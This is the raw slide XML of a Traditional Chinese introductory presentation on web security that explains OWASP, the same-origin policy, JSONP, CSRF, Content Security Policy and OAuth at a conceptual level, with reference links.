                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>網頁載入過程</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="450204"/>
            <a:ext cx="720000" cy="530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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475700" y="1091480"/>
            <a:ext cx="6192600" cy="165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zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;tag是不受同源政策限制的，我們可以用它來解決問題。</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>實有src屬性的不止有&lt;script&gt;,還有&lt;img&gt;和&lt;iframe&gt;，而&lt;iframe&gt;也是能夠運用JSONP的</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="2010490"/>
            <a:ext cx="41046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SzPts val="2200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1544950" y="2460900"/>
            <a:ext cx="5241150" cy="367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edeaa02d45_1_2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="2924944"/>
            <a:ext cx="4176600" cy="397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a:t>CSRF/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;gedeaa02d45_1_2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404352" y="3356992"/>
            <a:ext cx="4176600" cy="207000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="32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f24b9b62fb_0_164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475647" y="493575"/>
            <a:ext cx="6128700" cy="280800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CSRF 原理 ( Cross Site Request Forgery )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;gf24b9b62fb_0_164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="450204"/>
            <a:ext cx="720000" cy="530400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;gf24b9b62fb_0_164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411775" y="3429005"/>
            <a:ext cx="6192600" cy="1910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zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Security Policy是寫給瀏覽器看的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>他寫在從伺服端回應給使用者瀏覽器端網頁的HTTP Header裡主要用來限制網頁中對外部的請求來源(例如:css,js(ajax,ws),webfont,img,video,iframe等等)還有一部份是禁止HTML行內的JS或CSS運作</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>過濾XSS語法是伺服器端語言的工作(例如PHP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>如果不幸過濾失敗的話</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP的功能可以阻止惡意語法在瀏覽器端運作</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>算是多一道擋XSS的防線</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;gf24b9b62fb_0_164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="3033490"/>
            <a:ext cx="4104600" cy="280800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CSP(Content Security Policy)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;gf24b9b62fb_0_164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475650" y="980588"/>
            <a:ext cx="578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所以假設你點入駭客提供的 A 網站，其實背後已經發了個 B 網站的 request 而渾然不知。</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而這漏洞最可怕的是，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>你曾造訪過 B 網站，且 B 網站的 session 週期還沒過期（換言之，還在登入狀態）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>，同時 B 網站的 Server 驗證機制不夠全面，B 網站很可能就會認為此 request 是來自本人造訪 B網站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2411760" y="2924944"/>
            <a:ext cx="4176600" cy="397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800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OAuth</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404352" y="3356992"/>
            <a:ext cx="4176600" cy="207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320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="16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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="41046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SzPts val="2200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OAuth</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="450204"/>
            <a:ext cx="720000" cy="530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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="1484784"/>
            <a:ext cx="6192600" cy="424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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OAuth 是一種</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>授權</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>框架, 它可以授權其它第三方應用程式取得使用者資料</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>當然還是要經過使用者允許之後 (approval interaction), 才會授權給第三方取得使用者的資料</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="什麼是OAuth？這些Facebook，Twitter和Google登錄按鈕的工作原理" id="202" name="Google Shape;202;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="992500" y="2310950"/>
            <a:ext cx="6543675" cy="301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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="2924944"/>
            <a:ext cx="4176600" cy="397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800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>參考資料</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404352" y="3356992"/>
            <a:ext cx="4176600" cy="207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320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="16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f12382bff4_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="41046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SzPts val="2200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>參考資料</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;gf12382bff4_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;gf12382bff4_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="450204"/>
            <a:ext cx="720000" cy="530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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;gf12382bff4_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="1484784"/>
            <a:ext cx="6192600" cy="424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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ithelp.ithome.com.tw/articles/10196896</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>https://medium.com/hannah-lin/%E5%BE%88%E4%B8%8D%E9%90%B5%E4%BA%BA%E7%9A%84-it-%E9%90%B5%E4%BA%BA%E8%B3%BD-%E5%89%8D%E7%AB%AF%E5%B7%A5%E7%A8%8B%E5%B8%AB%E5%AD%B8%E8%B3%87%E8%A8%8A%E5%AE%89%E5%85%A8-6c6d6435aad8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idx="9" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063526" y="3429000"/>
            <a:ext cx="6850200" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>同源政策(Same Origin Policy)/CROS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>JSONP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OAuth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2411760" y="2924944"/>
            <a:ext cx="4176600" cy="397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800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t> OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404352" y="3356992"/>
            <a:ext cx="4176600" cy="207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320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Open Web Application Security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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="41046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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Open Web Application Security Project</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475650" y="1153500"/>
            <a:ext cx="57513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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>簡單的說就是推動世界軟體的安全性。OWASP 也歸納出容易攻擊的弱點並彙整為十大資安問題、排名、防範措施。</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
